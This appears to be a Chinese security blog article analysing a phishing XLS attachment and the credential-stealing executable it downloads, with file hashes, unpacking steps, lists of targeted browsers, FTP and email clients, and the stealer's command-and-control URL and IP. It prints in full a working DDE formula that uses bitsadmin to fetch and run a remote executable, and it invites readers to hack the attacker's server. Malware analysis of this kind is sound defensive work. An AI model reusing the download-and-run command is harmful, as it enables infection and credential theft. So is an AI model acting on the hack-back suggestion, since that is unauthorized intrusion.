40

藏匿在邮件里的“坏小子”

 6 years ago
source link: http://www.freebuf.com/articles/system/176238.html?amp%3Butm_medium=referral
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

*本文原创作者:JustPlay,本文属FreeBuf原创奖励计划,未经许可禁止转载

不知从什么时候开始,我的垃圾邮件开始暴增,而且主题千奇百怪,有“再也不用去澳门赌博”、“免保人、免抵押”…等推广主题;有“南北方压岁钱差距有多大?”、“爱过才知道什么是痛”…的段子主题;也有“+我微信 dw178gg”、“加扣扣 2848116852”…的交友主题。

这些大部分都能从标题就能判断出来是垃圾邮件,像那种日文、繁体字糅杂在一起的邮件就很难辨别,每次我都要点开看一看里面有什么。咳咳,言归正传,

这里面最让人头痛的还是藏匿在正常邮件里的病毒和钓鱼欺诈邮件,这些“坏小子”们可不仅仅骗个点击而已,稍有不慎我们损失的可能非常多…

一、基本信息

文件名 xx电子账单.xls SAH256 61472720ecd1f63f92593e271c0f1220001d0b2fe32a5ce732eb55c7b19c4e50 文件名 SwiftCopy.exe SHA256 db34f7a1ed8dfaf299cc0024dfe8ee4d7e813a0f1e7bf5794db3676a4d07bdd5

这是我某个邮件中的 xls 文件,以及打开表格后下载的可疑文件。拿到可疑文件第一时间还是扔到“虚拟执行环境”中先让它自己可劲儿折腾一番,很快分析报告就出来了

YFFvIjR.jpg!web

很可惜,从沙箱报告中看不出特别关键的信息,只能从行为上看出些许端倪,接下来需要我手动开始分析了…

二、行为分析

上手之前准备工作要做足,先梳理下流程:

YZfiAnb.jpg!web

2.1 XLS 文件(Downloader)

原始样本是一个 xls 文件,主要功能是作为一个 downloader。此文件使用了外部链接功能,这是一种除宏,漏洞之外的另一种载荷投递的方式。打开文件后会提示你更新,点击更新后又会让你确定是否要启动 cmd 进程。

NjuumiB.jpg!webjUjquai.jpg!web

点击文档中的 #REF!可以看到将要执行的命令行代码

=cmd|'
/c @echo Set objShell = CreateObject("Wscript.Shell") > Gm.vbs
& @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download http://www.mva.by/tags/SwiftCopy.exe
%temp%Gm.exe&%temp%Gm.exe",0,True >> Gm.vbs& Gm.vbs'!A0

样本会从 www.mva.by/tags 中下载 SwiftCopy.exe 存放到临时目录下,然后运行。

2.2 SwiftCopy.exe 文件

使用 PEiD 查一下壳,显示为 ASProtect,我的脱壳技术一塌糊涂,在网上找了一个 OD 的脚本,瞬间脱壳,感谢网友的分享,网友博客链接: https://blog.csdn.net/qingye2008/article/details/1898190

脚本名为 Aspr2.XX_unpacker_v1.osc,大家可以从网上搜索一下这个名字,应该可以搜到。

Bv6NrqI.jpg!web

脱完壳之后是一个 Delphi 程序,其主要目的是创建自身并注入,但是如果不经过九曲十八弯的操作显示不出他的强大,他会循环调用自身中的一些函数,调用次数为 0x3B,这些函数中大部分没什么实质性的作用,但是万万不可大意,这些函数中还有反沙箱的操作,通过获得光标的值,判断光标是否在移动,而且这个循环会连续循环 7 次。

3aqUbu7.jpg!web

最终样本会创建自身并注入,不用想,重点功能肯定在注入的这部分代码中。

2.3 子进程

待到父进程调用 ZwResumeThread 时附加到目标进程中,代码结构比较简单,如果参数中有-u参数,将会睡眠一段时间。

QZreiyj.jpg!web

值得一提的是,程序中调用的系统函数都是动态获得的,从而大大增加了静态分析的难度。 NfmAzyq.jpg!web

此样本的重点功能就是信息窃取,可以说是相当的全面,循环调用函数,可以看到循环次数为 101,窃取的信息包含浏览器信息,邮箱信息,远程登陆客户端信息等。 Qz6n6nF.jpg!web

此时的程序已经没有了混淆,进入函数后就可以看到程序要窃取信息的目标。 ZvuuQnj.jpg!web

对这些函数进行统计,获得的信息如下(可以说是相当全面)

浏览器类:

Internet Explorer,Mozilla Firefox,Google Chrome,KMeleon,Comodo Dragon,Comodo IceDragon,SeaMonkey,Opera,Safari,CoolNovo,Rambler Nichrome,RockMelt,Baidu Spark,Chromium,Titan Browser,Torch Browser,Yandex.Browser,Epic Privacy Browser,Sleipnir Browser,Vivaldi,Coowon Browser,Superbird Browser,Chromodo Browser,Mustan Browser,360 Browser,Cyberfox (x32+x64),Pale Moon,Maxthon browser,Citrio Browser,Chrome Canary,Waterfox,Orbitum,Iridium,

读取浏览器的ini文件

JNRBfav.jpg!web

读取登录数据 6fmIBbU.jpg!web

远程登录客户端类:

TotalCommander,FlashFXP,FileZilla,FARManager,CyberDuck,Bitvise,NovaFTP,NetDrive,NppFTP,FTPShell,SherrodFTP,MyFTP,FTPBox,FtpInfo,LinesFTP,FullSync,NexusFile,JaSFtp,FTPNow,Xftp,EasyFTP,GoFTP,NETFile,BlazeFtp,StaffFTP,DeluxeFTP,ALFTP,FTPGetter,WS_FTP,AbleFTp,Automize,RealVNC,TightVNC,Syncovery,mSecureWallet,SmartFTP,FreshFTP,BitKinex,UltraFXP,FTPRush,VandykSecureFX,OdinSecureFTPExpert,Fling,ClassicFTP,Maxthonbrowser,Kitty(login+privatekey),WinSCP,RemminaRDP,WinFTP,32BitFTP,FTPNavigator

获取用户名和密码

URJnYnA.jpg!web

邮箱类:

Outlook,MozillaThunderbird,Foxmail,Pocomail,Incredimail,GmailNotifierPro,SNetzMailer,Checkmail,OperaMail,FossaMail,MailSpeaker,yMail

获取用户名和密码

2mIZBrr.jpg!webJzq6Zjj.jpg!web

样本会根据不同的目标,通过不同的方式窃取数据,可见作者对这些信息相当熟悉。

最终样本会将获得的信息发送到服务端,分析此样本捕获到的 url 为 http://admino.gq/stan/ Panel/fre.php

此域名对应的 IP 为 103.63.2.227,通过情报社区查询,标签有垃圾邮件、钓鱼。红客大佬们可以尝试入侵入侵,看看攻击者截获了多少信息。

fmu2MbM.jpg!web

接着样本会在 Roming 目录下创建一个文件夹,并将自身拷贝过去,命名为 618D9F. exe,并且将文件属性设置为隐藏。

最后还将在一个无限循环中创建线程,此线程会调用窃取信息的函数,删除目标文件,下载文件并执行。

三、总结

其实这些使用电子邮件和主题吸引用户阅读并打开附件,大部分是针对企业或组织。“坏小子”们伪装的方式非常多,潜伏在一些 DOC、XLS、EXE 等常见的文件格式中也会让人放松警惕,一旦盲目打开或点击电子邮件中的链接,后果可能非常严重!最好的办法就是不要打开他们,不要冒任何感染风险,除非你会使用沙箱产品或具备文件分析的能力。

P.S. 这个样本功能齐全,信息量相当大,我也只分析个皮毛,对这个样本感兴趣的朋友们可以下载下来继续深度分析,肯定能够学到很多知识。

报告地址如下:

db34f7a1ed8dfaf299cc0024dfe8ee4d7e813a0f1e7bf5794db3676a4d07bdd5

*本文原创作者:JustPlay,本文属FreeBuf原创奖励计划,未经许可禁止转载


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK